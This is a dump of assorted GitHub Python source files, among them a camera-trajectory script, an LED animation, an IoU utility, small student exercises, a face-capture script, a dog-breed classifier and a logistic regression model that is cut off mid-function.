min(len(os.listdir(camera_path)), len(res))\n print(frame_count)\n\n # frame_count = 288\n pos_res, cam = [], []\n d = np.array([0, 0, 0, 1])\n\n # =============================================================================\n # get raw torso center, filter\n # =============================================================================\n bbox, ratio = [], []\n temp_t_1 = 0\n for i in range(frame_count):\n # for i in range(80,95):\n v = res[i]\n if v[2] <= 0.5:\n print('bad prediction in frame: ', i)\n bbox.append((np.nan, np.nan))\n else:\n bbox.append((v[0], v[1]))\n\n bcenter = 
np.array(bbox)\n bx = interp_(bcenter[:, 0])\n by = interp_(bcenter[:, 1])\n bcenter = np.stack((bx, by)).T\n bx, by = kf2d(bcenter)\n # bx,by = jitter(bcenter)\n res = []\n for i in range(frame_count):\n # for i in range(210,220):\n # real depth estimation\n full_file = \"%s/frame_%06d.raw\" % (frame_Path_filtered, i)\n # full_file = \"%s/frame_%06d.raw\" % (frame_Path_midas, i)\n depth_real = load_real_depth(full_file).numpy()\n\n cam_path = \"%s/frame_%06d.npz\" % (camera_path, i)\n fx, fy, G = load_cam_params(cam_path)\n subx = bx.astype(int)[i]\n suby = by.astype(int)[i]\n\n mean_depth = take_average_depth(depth_real, subx, suby)\n\n # #get 3d position(x,y,z) for current frame\n H, W = depth_real.shape\n z = mean_depth\n x = (subx - W / 2) * z / fx # assume cx,cy is always at img center\n y = (suby - H / 2) * z / fy\n # print(x,y,z)\n # print(pose_distance(G))\n pos_res.append(np.array([x, y, z]))\n\n # get cam_traj by tracking\n d = np.matmul(G, d)\n # print(d)\n cam.append(d)\n\n # from P_cam to P_world with cam_extrinsics\n R = G[:3, :3]\n t = G[:3, 3]\n p = np.array([x, y, z])\n # X = np.matmul(R.T,p) - np.matmul(R.T,t)\n X = np.matmul(R.T, (p - t))\n\n temp = take_average_wp(depth_real, subx, suby, fx, fy, G, subx, suby)\n res.append(temp)\n\n # p = pos_res[:] - pos_res[0] #translation pred from depth map\n # p = other_p[:] - other_p[0]\n p = res[:] - res[0]\n pfx, pfy, pfz = kf3d(p)\n pf = np.stack((-pfx, pfy, pfz)).T\n traj_file_name = os.path.join(root_dir, 'temp/' + folder_id + '/traj.txt')\n np.savetxt(traj_file_name, pf)\n print(\"end\")\n\n # =============================================================================\n # p is not displacement, only scale error\n # d = np.array([0,0,0])\n # res = []\n # for i in range(len(other_p)):\n # d = d + p[i]\n # res.append(d)\n #\n # p = res[:] - res[0]\n # =============================================================================\n\n # c = cam[:] - cam[0] #translation pred from cam ego-motion\n\n # 
ax.plot3D(c[:,0], c[:,1], c[:,2], 'gray') #the scale is incorrect\n #plot3d(pf)\n\n pg = coords_trans_face(pf)\n #plot3d(pg)\n\n\ncvd_main_process()\n","repo_name":"wisermaclab/CROMOSIM","sub_path":"backend/script/cvd_process.py","file_name":"cvd_process.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44178217278","text":"from math import sin\nfrom color import random_hue, hue_to_color, random_color, black, gradient_wheel, rgb_to_hsv\nfrom random import random, randint, choice\n\nimport HelperFunctions as helpfunc\n\n\nclass Bullet(object):\n def __init__(self, hexmodel, pos, color, direction):\n self.hexes = hexmodel\n self.color = color\n self.direction = direction\n self.pos = pos\n self.intense = 1\n\n def draw_bullet(self):\n self.hexes.set_cell(self.pos, helpfunc.gradient_wheel(self.color, self.intense))\n\n def move_bullet(self):\n new_spot = helpfunc.hex_in_direction(self.pos, self.direction) # Where is the bullet shooting?\n if self.hexes.cell_exists(new_spot): # Is new spot off the board?\n self.pos = new_spot # On board. 
Update spot\n self.intense -= 0.05\n return True # Still traveling\n else:\n return False # Off board - kill\n\n\nclass Sprocket(object):\n def __init__(self, hexmodel, center, color, min, thick):\n self.hexes = hexmodel\n self.color = color\n self.min = min\n self.thick = thick\n self.center = center\n self.life = randint(20, 100)\n self.blade = randint(5, 15) / 10.0\n self.color_churn = randint(2, 10)\n\n def draw_sprocket(self, clock):\n for r in range(self.min, self.min + self.thick):\n ring_cells = helpfunc.hex_ring(self.center, r)\n num_cells = len(ring_cells)\n for i in range(num_cells):\n col = (self.color + clock + (r * self.color_churn)) % 255\n attenuation = 1 - ( ((i + clock) % r) * (1.0 / (r * self.blade)))\n if attenuation < 0:\n attenuation = 0\n if r % 2:\n index = num_cells - i - 1\n else:\n index = i\n if self.hexes.cell_exists(ring_cells[index]):\n self.hexes.set_cell(ring_cells[index], gradient_wheel(hue_to_color(col), attenuation))\n\n if helpfunc.one_in(6):\t# Flash the hole - Greg's suggestion\n col = (self.color + clock) % 255\n self.hexes.set_cell(self.center, hue_to_color(col)) # center\n\n for r in range(self.min):\n ring_cells = helpfunc.hex_ring(self.center, r)\n col = (self.color + clock + (r * self.color_churn)) % 255\n self.hexes.set_cells(ring_cells, hue_to_color(col))\n\n def move_sprocket(self):\n self.life -= 1\n return self.life > 0\n\n\nclass Sprockets(object):\n def __init__(self, hexmodel):\n self.name = \"Sprockets\"\n self.hexes = hexmodel\n self.sprockets = [] # List that holds Sprockets objects\n self.bullets = [] # List that holds Bullet objects\n self.direction = 1\n self.clock = 1000\n self.speed = 0.2 * randint(1, 4)\n\n def next_frame(self):\n\n while True:\n\n if len(self.sprockets) < helpfunc.NUM_HEXES:\n for h in helpfunc.all_hexes():\n self.sprockets.append(Sprocket(self.hexes, center=helpfunc.get_center(h), color=random_hue(),\n min=randint(1, 4), thick=7))\n\n self.hexes.black_all_cells()\n\n # Draw the 
Sprockets\n\n for sprocket in self.sprockets:\n sprocket.draw_sprocket(self.clock)\n if not sprocket.move_sprocket:\n self.sprockets.remove(sprocket)\n\n # Draw the Bullets\n\n for bullet in self.bullets:\n bullet.draw_bullet()\n if not bullet.move_bullet():\n self.bullets.remove(bullet)\n\n yield self.speed \t# random time set in init function\n\n self.clock += self.direction\n\n if helpfunc.one_in(50):\n self.direction *= -1","repo_name":"stevedudek/Hexes","sub_path":"textures/Sprockets.py","file_name":"Sprockets.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13482621902","text":"import torch\n\n\ndef xyxy2xywh(x):\n wh = x[..., 2:] - x[..., :2]\n return torch.cat([x[..., :2], wh], axis=-1)\n\n\ndef cxcywh2xyxy(x):\n mins = x[..., :2] - x[..., 2:] / 2\n maxes = x[..., :2] + x[..., 2:] / 2\n return torch.cat([mins, maxes], axis=-1)\n\n\ndef xyxy2cxcywh(x):\n wh = x[..., 2:] - x[..., :2]\n cxcy = x[..., :2] + wh / 2\n return torch.cat([cxcy, wh], axis=-1)\n\n\ndef calculate_intersections(set_1, set_2):\n \"\"\"\n Args:\n set_1, set_2: float32 tensors. Bounding boxes in `xyxy` format.\n Shape: [n1, 4], [n2, 4].\n\n Returns:\n areas: float32 tensor. Shape: [n1, n2].\n \"\"\"\n set_1 = torch.unsqueeze(set_1, axis=1) # [n1, 1, 2]\n lower_bounds = torch.maximum(set_1[..., :2], set_2[..., :2]) # [n1, n2, 2]\n upper_bounds = torch.minimum(set_1[..., 2:], set_2[..., 2:]) # [n1, n2, 2]\n intersect_rectangle = torch.clip(upper_bounds - lower_bounds, min=0) # [n1, n2, 2]\n areas = torch.prod(intersect_rectangle, axis=-1) # [n1, n2]\n return areas\n\n\ndef calculate_ious(set_1, set_2):\n \"\"\"\n Args:\n set_1, set_2: float32 tensors. Bounding boxes in `xyxy` format.\n Shape: [n1, 4], [n2, 4].\n\n Returns:\n ious: float32 tensor. 
Shape: [n1, n2].\n \"\"\"\n intersections = calculate_intersections(set_1, set_2) # [n1, n2]\n areas_set_1 = torch.prod(set_1[:, 2:] - set_1[:, :2], axis=-1) # [n1]\n areas_set_2 = torch.prod(set_2[:, 2:] - set_2[:, :2], axis=-1) # [n2]\n\n # Find the union\n areas_set_1 = torch.unsqueeze(areas_set_1, axis=-1) # [n1, 1]\n unions = (areas_set_1 + areas_set_2 - intersections) # [n1, n2]\n ious = intersections / unions # [n1, n2]\n return ious\n","repo_name":"saaresearch/ODRS","sub_path":"ODRS/train_utils/train_model/models/PyTorch-SSD/utils/boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"70231143722","text":"import math\n\nclass Háromszög:\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n \n def Szerkeszhetőség(self):\n return (self.a + self.b > self.c and\n self.b + self.c > self.a and\n self.c + self.a > self.b)\n \n def Kerület(self):\n return self.a + self.b + self.c\n \n def Terület(self):\n s = (self.a + self.b + self.c) / 2\n return math.sqrt(s * (s - self.a) * (s - self.b) * (s - self.c))\n \n def Háromszögbe_írható_kör(self):\n return self.Terület() / (self.Kerület() / 2)\n \n def Beírás(self):\n f = open(\"eredmeny.txt\", \"a\")\n if self.Szerkeszhetőség():\n f.write(f\"Kerület: {self.Kerület()}\\n\")\n f.write(f\"Terület: {self.Terület()}\\n\")\n f.write(f\"Szerkeszthető: Igen\\n\")\n f.write(f\"Háromszögbe írt kör sugara: {self.Háromszögbe_írható_kör()}\\n\")\n else:\n f.write(\"Nem lehetséges a háromszog létrehozása.\\n\")\n\n\na = float(input(\"Adja meg az a oldal hosszát: \"))\nb = float(input(\"Adja meg a b oldal hosszát: \"))\nc = float(input(\"Adja meg a c oldal hosszát: \"))\n\nháromszög = Háromszög(a, b, c)\nháromszög.Beírás()\n\nif Háromszög.Szerkeszhetőség():\n print(f\"A háromszög kerülete: {Háromszög.Kerület()}\")\n print(f\"A háromszög területe: {Háromszög.Terület()}\")\n print(f\"A 
háromszög szerkeszthető: Igen\")\n print(f\"A háromszögbe írható kör sugara: {Háromszög.Háromszögbe_írható_kör()}\")\nelse:\n print(\"Nem lehet létrehozni a háromszöget.\")\n\n","repo_name":"hauszmanndavid/Python-03.29","sub_path":"háromszög.py","file_name":"háromszög.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4482737489","text":"'''\n分数電卓\n'''\n\nfrom fractions import Fraction\n\ndef add(a,b):\n print('計算結果: {0} + {1} = {2}'.format(a,b,a+b))\n\ndef subtract(a,b):\n print('計算結果: {0} - {1} = {2}'.format(a,b,a-b))\n\ndef devide(a,b):\n print('計算結果\b: {0} / {1} = {2}'.format(a,b,a/b))\n\ndef multi(a,b):\n print('計算結果: {0} * {1} = {2}'.format(a,b,a*b))\n\nif __name__ == '__main__':\n try:\n a = Fraction(input('分数を入力してください'))\n b = Fraction(input('分数を入力してください'))\n operation = input('希望する操作を選んで下さい。 - add,subtract,devide,multi:')\n if operation == 'add':\n add(a,b)\n if operation == 'subtract':\n subtract(a,b)\n if operation == 'devide':\n devide(a,b)\n if operation == 'multi':\n multi(a,b)\n except ValueError:\n print('無効な入力です')\n","repo_name":"junnnnn06/python","sub_path":"11.分数電卓.py","file_name":"11.分数電卓.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12879529359","text":"import cv2\r\nimport numpy as np\r\n\r\ncam = cv2.VideoCapture(0)\r\nfaceCascade=cv2.CascadeClassifier('C:\\\\Users\\\\omkar\\\\Anaconda3\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml')\r\n\r\nId=input('enter your id')\r\nname=input('enter your name')\r\nsampleNum=0\r\nwhile(True):\r\n ret, img = cam.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5,)\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n #incrementing sample number \r\n 
sampleNum=sampleNum+1\r\n #saving the 1\r\n #captured face in the dataset folder\r\n cv2.imwrite(\"ImageDataSet/dataset\"+Id +name+'.'+ str(sampleNum) +\".jpg\", gray)\r\n cv2.imshow('frame',img)\r\n \r\n if cv2.waitKey(5) & 0xFF == ord('q'):\r\n break\r\n # break if the sample number is morethan 20\r\n elif sampleNum>100:\r\n break\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n","repo_name":"OmkarNehete/HomeSecuritySystem","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21469619336","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path('parents', views.ParentListView.as_view(), name='parent-list'),\n path('add_parent', views.ParentAddView.as_view(), name='parent-add'),\n path('edit_parent/', views.ParentEditView.as_view(), name='edit_parent'),\n path('update_parent/', views.ParentUpdateView.as_view(), name='update_parent'),\n path('detail_parent/', views.ParentDetailView.as_view(), name='detail_parent'),\n path('delete_parent/', views.DeleteParentView.as_view(), name='delete_parent'),\n]","repo_name":"codingspider/Schoolscript","sub_path":"School/parent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35827063858","text":"import torch\nfrom PIL import Image\nfrom torchvision import transforms, models\nfrom torch.autograd import Variable\n\nclass Model:\n\tdef __init__(self):\n\t\tself.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\t\treturn\n\n\tdef load(self, model_path):\n\t\tself.dog_identifier_model = models.wide_resnet50_2()\n\t\tnum_features = self.dog_identifier_model.fc.in_features\n\t\tself.dog_identifier_model.fc = torch.nn.Linear(num_features, 
120)\n\n\t\tself.dog_identifier_model.load_state_dict(torch.load(model_path, map_location='cpu'))\n\t\tself.dog_identifier_model.eval()\n\n\t\tself.dog_detector_model = models.vgg16(pretrained=True)\n\n\tdef _load_image(self, image):\n\t\t# image = Image.open(image).convert(\"RGB\")\n\n\t\tdata_transform = transforms.Compose([transforms.Scale(224),\n\t\t transforms.CenterCrop(224),\n\t\t transforms.ToTensor(),\n\t\t transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\t\timage = data_transform(image)[:3, :, :].unsqueeze(0)\n\n\t\treturn image\n\n\tdef _detect_dog(self, image):\n\t\toutput = self.dog_detector_model(image)\n\t\treturn torch.max(output, 1)[1].item()\n\n\tdef predict(self, image):\n\t\timage = self._load_image(image)\n\t\timage = Variable(image).to(self.device)\n\n\t\tif (151 <= self._detect_dog(image) <= 268):\n\t\t\toutput = self.dog_identifier_model(image)\n\t\t\tp = torch.nn.functional.softmax(output, dim=1)\n\t\t\tp = p.data.cpu().numpy()\n\n\t\t\treturn p[0], p[0].argsort()[-5:][::-1]\n\n\t\telse:\n\t\t\tprint(\"No dog detected!\")\n\t\t\treturn None, None","repo_name":"nathan-vo810/Dog-Breed-Identifier","sub_path":"dog_breed_identifier_backend/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17047146360","text":"from sklearn import svm\n\n\ndef svm_(X_train, Y_train, X_test, Y_test):\n # Create model instance and fit model\n clf = svm.SVC(probability=True)\n clf.fit(X_train, Y_train)\n\n # Make predictions\n train_predict = clf.predict(X_train)\n train_proba = clf.predict_proba(X_train)\n print(\n f'Y_train: {Y_train}\\ntrain_predict: {train_predict}\\ntrain_proba: \\n{train_proba}\\naccuracy: {clf.score(X_train, Y_train)}\\n')\n\n test_predict = clf.predict(X_test)\n test_proba = clf.predict_proba(X_test)\n print(\n f'Y_test: {Y_test}\\ntest_predict: {test_predict}\\ntest_proba: 
\\n{test_proba}\\naccuracy: {clf.score(X_test, Y_test)}\\n')\n\n\nif __name__ == \"__main__\":\n import numpy as np\n from sklearn.model_selection import train_test_split\n\n # Create a dataset and give any value\n X, Y = np.arange(10).reshape((5, 2)), range(5)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.2)\n print(f\"X:\\n{X}\\nY:{Y}\")\n\n svm_(X_train, Y_train, X_test, Y_test)\n","repo_name":"LWIZN/sklearn_classifier_test","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34070574558","text":"\"\"\"\nDetermine if a given string is a palindrome\nA palindrome is sequence that reads same backwards as forwards. \n\n“Anna”, for example is a palindrome.\n-> Ana\n-> abc cba\n-> Note that we have a capital A \n\nThe task is to determine if a given string is a palindrome\n\"\"\"\ndef is_palindrome(input_string):\n # Idea 3\n # Access the first element with a 0.\n # Last element with length - 1.\n # Loop that compares first with last, second with penultimate, and so on ...\n # Ignore the middle letter if we have an oddly-numbered word.\n # Time complexity?\n # -> .lower()\n # -> rest will be O(n/2)\n\n # Should we do .lower() for the whole string? 
Or on the fly (in the loop)?\n # If we do .lower() on a lower-case string, we still have to check the \n # capitalization of EACH character!\n\n # input_string = abc -> odd will ignore middle character\n # input_string = abbc -> even will check middle characters\n\n first_index = 0\n # last_index = len(input_string) - 1\n while first_index < len(input_string) // 2:\n # if input_string[first_index] == input_string[len(input_string) - first_index - 1]:\n if input_string[first_index].lower() == input_string[-(first_index + 1)].lower():\n first_index += 1\n else:\n return False\n\n return True\n\nif is_palindrome(\"ABCC CCCA\"):\n print(\"True\")\nelse: \n print(\"False\") # -> This one\n\nif is_palindrome(\"Anna\"):\n print(\"True\") # -> This one\nelse:\n print(\"False\")\n\nif is_palindrome(\"Ana\"):\n print(\"True\") # -> This one\nelse:\n print(\"False\")\n\nif not is_palindrome(\"Jan\"):\n print(\"True\")\nelse:\n print(\"False\") # -> This one\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"janspoerer/computational-semantics","sub_path":"mock_exam/_01_palindrome.py","file_name":"_01_palindrome.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13664651591","text":"import random\r\n\r\ndef guessWord():\r\n wordlist = [\"test\", \"word\", \"rhythm\", \"mystic\"]\r\n\r\n randnum = random.randint( 0, len(wordlist) ) # get rand num between 0 and length of wordlist\r\n secret = wordlist[randnum - 1] # -1 because of 0-based indexing\r\n so_far = [\"_\"] * len(secret)\r\n guesses = [] # start with an empty string of guesses\r\n turns = 5 # can change this number\r\n\r\n still_playing = True\r\n\r\n \r\n # GAME LOOP\r\n while (still_playing) and (turns > 0): # while the total word guessed is not the secret word, ie, game isn't over yet\r\n print(\"You have \" + str(turns) + \" turns left!\")\r\n print(\"Your guesses so far 
are: \" + str(so_far))\r\n \r\n guess = input(\"Guess a letter: \") # guess 1 letter\r\n guesses = guesses.append(guess)\r\n\r\n if guess in guesses: # check if the letter is in the already-guessed letters\r\n print(\"You already guessed that letter!\")\r\n\r\n elif guess not in secret: # if letter isn't in guesses and isn't in secret...\r\n print(\"Your guessed letter, \" + guess + \", isn't in the secret word\")\r\n\r\n\r\n elif guess in secret: # if the guess is in secret and hasn't been guessed already\r\n for i in range(len(secret)): # looping over the length of secret word\r\n if guess == secret[i]: # compare the guessed letter to the letter whose index we're on\r\n so_far[i] = guess # update so_far so that its guessed letter matches the secret\r\n\r\n\r\n # check if the game is won yet\r\n correct = 0\r\n for i in range(len(secret)):\r\n if so_far[i] == secret[i]: # check if the secret's letter at that index is the same as so_far's index\r\n correct = correct + 1\r\n \r\n if correct == len(secret): # if the number of correct letters are the same as the length of the secret word, then all of so_far is correct\r\n still_playing = False\r\n turns = turns + 1\r\n\r\n turns = turns - 1\r\n\r\n # IS THE GAME OVER?\r\n # if the game was lost, ie, not all letters were guessed before turns ran out\r\n if turns == 0:\r\n print(\"You ran out of turns! The secret word was: \" + secret)\r\n else: # if the game wasn't ended because you ran out of turns\r\n print(\"You won! 
Your word was: \" + secret)\r\n\r\n\r\n\r\nguessWord()\r\n","repo_name":"skamkam/empow","sub_path":"badge4_guesstheword.py","file_name":"badge4_guesstheword.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7227113060","text":"# -*- coding:utf-8 -*-\nimport itertools\nH, W = map(int, input().split())\ns = [ list(input()) for h in range(H) ]\nfor y in range(H):\n for x in range(W):\n if s[y][x] == '#':\n continue\n y1 = [ tmp for tmp in [ y-1, y, y+1 ] if tmp >= 0 and tmp < H ]\n x1 = [ tmp for tmp in [ x-1, x, x+1 ] if tmp >= 0 and tmp < W ]\n bomb = 0\n for pair in itertools.product(y1,x1):\n if pair[0] == y and pair[1] == x:\n continue\n if s[pair[0]][pair[1]] == '#':\n bomb += 1\n else:\n pass\n s[y][x] = str(bomb)\nfor y in range(H):\n print(''.join(s[y]))\n","repo_name":"Lischero/Atcoder","sub_path":"ABC075/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"219891710","text":"import numpy as np\nimport scipy.special as sc\nimport math\n\n\nclass Model(object):\n\n def __init__(self):\n self.num_input_features = None\n\n def fit(self, X, y):\n \"\"\" Fit the model.\n\n Args:\n X: A compressed sparse row matrix of floats with shape\n [num_examples, num_features].\n y: A dense array of ints with shape [num_examples].\n \"\"\"\n raise NotImplementedError()\n\n def predict(self, X):\n \"\"\" Predict.\n\n Args:\n X: A compressed sparse row matrix of floats with shape\n [num_examples, num_features].\n\n Returns:\n A dense array of ints with shape [num_examples].\n \"\"\"\n raise NotImplementedError()\n\n\nclass Useless(Model):\n\n def __init__(self):\n super().__init__()\n self.reference_example = None\n self.reference_label = None\n\n def fit(self, X, y):\n self.num_input_features = X.shape[1]\n # Designate the first training example as 
the 'reference' example\n # It's shape is [1, num_features]\n self.reference_example = X[0, :]\n # Designate the first training label as the 'reference' label\n self.reference_label = y[0]\n self.opposite_label = 1 - self.reference_label\n\n def predict(self, X):\n if self.num_input_features is None:\n raise Exception('fit must be called before predict.')\n # Perhaps fewer features are seen at test time than train time, in\n # which case X.shape[1] < self.num_input_features. If this is the case,\n # we can simply 'grow' the rows of X with zeros. (The copy isn't\n # necessary here; it's just a simple way to avoid modifying the\n # argument X.)\n num_examples, num_input_features = X.shape\n if num_input_features < self.num_input_features:\n X = X.copy()\n X._shape = (num_examples, self.num_input_features)\n # Or perhaps more features are seen at test time, in which case we will\n # simply ignore them.\n if num_input_features > self.num_input_features:\n X = X[:, :self.num_input_features]\n # Compute the dot products between the reference example and X examples\n # The element-wise multiply relies on broadcasting; here, it's as if we first\n # replicate the reference example over rows to form a [num_examples, num_input_features]\n # array, but it's done more efficiently. This forms a [num_examples, num_input_features]\n # sparse matrix, which we then sum over axis 1.\n dot_products = X.multiply(self.reference_example).sum(axis=1)\n # dot_products is now a [num_examples, 1] dense matrix. 
We'll turn it into a\n # 1-D array with shape [num_examples], to be consistent with our desired predictions.\n dot_products = np.asarray(dot_products).flatten()\n # If positive, return the same label; otherwise return the opposite label.\n same_label_mask = dot_products >= 0\n opposite_label_mask = ~same_label_mask\n y_hat = np.empty([num_examples], dtype=np.int)\n y_hat[same_label_mask] = self.reference_label\n y_hat[opposite_label_mask] = self.opposite_label\n return y_hat\n\n\nclass LogisticRegression(Model):\n\n def __init__(self, gd_iterations, number_of_features_to_select, online_learning_rate):\n super().__init__()\n # TODO: Initializations etc. go here.\n self.w = None\n self.online_learning_rate = online_learning_rate\n self.gd_iterations = gd_iterations\n self.number_of_features_to_select = number_of_features_to_select\n self.indices = None\n self.num_examples = None\n\n # def fit(self, X, y):\n # # TODO: Write code to fit the model.\n # self.num_input_features = X.shape[1]\n # num_examples,num_input_features = X.shape;\n # self.w=np.zeros([num_input_features],dtype=np.float)[np.newaxis]\n # g = np.empty([num_examples], dtype=np.int)[np.newaxis]\n # g_neg = np.empty([num_examples], dtype=np.int)[np.newaxis]\n # ones=np.ones([num_examples])\n # X_neg=-1*X;\n # # print(g.shape)\n #\n # for k in range(self.gd_iterations):\n # for i,row in enumerate(X.toarray()):\n # # print(row.shape)\n # row=row[np.newaxis]\n # val=self.w@row.T\n # # print(val.shape)\n # prob=sc.expit(val[0,0]);\n # g[0,i]=y[i]*(1-prob);\n # g_neg[0,i]=(1-y[i])*(prob);\n #\n #\n #\n # # grad=(np.multiply(y,g_neg)@X)+(np.multiply(ones-y,g)@((-1)*X))\n # # g=g[np.newaxis]\n # # g_neg=g[np.newaxis]\n # # print(X.shape)\n # grad_1=g*X\n # # print(grad_1.shape)\n # grad_2=g_neg*X_neg\n # delta = np.zeros(shape=(1, self.num_input_features), dtype=float);\n # grad=grad_1+grad_2;\n #\n # self.w= self.w + self.online_learning_rate*grad;\n\n def fit(self, X, y):\n # TODO: Write code to fit the 
model.\n\n self.num_examples, self.num_input_features = X.shape\n if self.number_of_features_to_select != -1:\n X = self.feature_Selection(X, y)\n\n self.num_examples, self.num_input_features = X.shape\n\n self.w = np.zeros(shape=(1, self.num_input_features), dtype=float)\n prob = np.zeros(shape=(1, self.num_examples), dtype=float)\n prob_neg = np.zeros(shape=(1, self.num_examples), dtype=float)\n\n for i in range(self.gd_iterations):\n delta = np.zeros(shape=(1, self.num_input_features), dtype=float)\n prob = sc.expit(self.w@X.T)\n prob_neg = sc.expit(-1 * (self.w@X.T))\n\n delta = (np.multiply(y, prob_neg)) * X + \\\n (np.multiply(1 - y, prob)) * (-1 * X)\n self.w += self.online_learning_rate * delta\n\n def predict(self, X):\n # TODO: Write code to make predictions.\n if self.num_input_features is None:\n raise Exception('fit must be called before predict.')\n\n try:\n if self.num_input_features != -1:\n X = X[:, self.indices]\n except:\n pass\n\n num_examples, num_input_features = X.shape\n if num_input_features < self.num_input_features:\n X = X.copy()\n X._shape = (num_examples, self.num_input_features)\n # Or perhaps more features are seen at test time, in which case we will\n # simply ignore them.\n if num_input_features > self.num_input_features:\n X = X[:, :self.num_input_features]\n try:\n if self.num_input_features != -1:\n X = X[:, self.indices]\n except:\n pass\n\n y_hat = np.empty([num_examples], dtype=np.int)\n\n for i, row in enumerate(X.toarray()):\n row = row[np.newaxis]\n val = self.w@row.T\n prob = sc.expit(val)\n if prob >= 0.5:\n y_hat[i] = 1\n else:\n y_hat[i] = 0\n return y_hat\n\n def calculate_conditional_entropy(self, prob_x1_y1, prob_x1_y0, prob_x0_y1, prob_x0_y0, px0, px1):\n log_prob__y1_x0 = log_prob__y1_x1 = log_prob__y0_x0 = log_prob__y0_x1 = 0\n\n if (prob_x0_y1 == 0):\n log_prob__y1_x0 = 0\n else:\n log_prob__y1_x0 = np.log2(prob_x0_y1)\n\n if (prob_x1_y1 == 0):\n log_prob__y1_x1 = 0\n else:\n log_prob__y1_x1 = 
np.log2(prob_x1_y1)\n\n if (prob_x1_y0 == 0):\n log_prob__y0_x1 = 0\n else:\n log_prob__y0_x1 = np.log2(prob_x1_y0)\n\n if (prob_x0_y0 == 0):\n log_prob__y0_x0 = 0\n else:\n log_prob__y0_x0 = np.log2(prob_x0_y0)\n\n entropy_yx1 = (prob_x1_y1 * log_prob__y1_x1) + \\\n (prob_x1_y0 * log_prob__y0_x1)\n entropy_yx0 = (prob_x0_y1 * log_prob__y1_x0) + \\\n (prob_x0_y0 * log_prob__y0_x0)\n entropy_yx = -((px0 * entropy_yx0) + (px1 * entropy_yx1))\n\n return entropy_yx\n\n # Calculate Information gain for each feature\n def feature_Selection(self, X, y):\n # Calculate H(Y)\n unique_values_y, counts_y = np.unique(y, return_counts=True)\n prob_y0 = counts_y[0] / self.num_examples\n prob_y1 = counts_y[1] / self.num_examples\n # entropy_y = -((prob_y0)*np.log2(prob_y0)) -((prob_y1)*np.log2(prob_y1))\n ig = np.zeros([self.num_input_features])\n\n for feature in range(self.num_input_features):\n # flatten to 1 dimension\n temp = X[:, feature].toarray().squeeze()\n\n # count unique values in each column\n count_for_each_col = np.zeros([2])\n unique_values_xj, count_of_xj = np.unique(temp, return_counts=True)\n\n count_x1_y1 = count_x1_y0 = count_x0_y1 = count_x0_y0 = 0\n\n # if data is continuous we will use the mean as the threshold\n if len(unique_values_xj) != 2:\n mean = np.mean(temp)\n count_for_each_col[0] = np.where(temp < mean)[0].size\n count_for_each_col[1] = np.where(temp >= mean)[0].size\n # Get joint probabilities for x and y\n for row in range(self.num_examples):\n if(temp[row] < mean):\n if(y[row] == unique_values_y[0]):\n count_x0_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x0_y1 += 1\n elif(temp[row] >= mean):\n if(y[row] == unique_values_y[0]):\n count_x1_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x1_y1 += 1\n\n else:\n count_for_each_col[0] = count_of_xj[0]\n count_for_each_col[1] = count_of_xj[1]\n # Get joint probabilities for x and y\n for row in range(0, self.num_examples):\n if(temp[row] == 0):\n if(y[row] == unique_values_y[0]):\n 
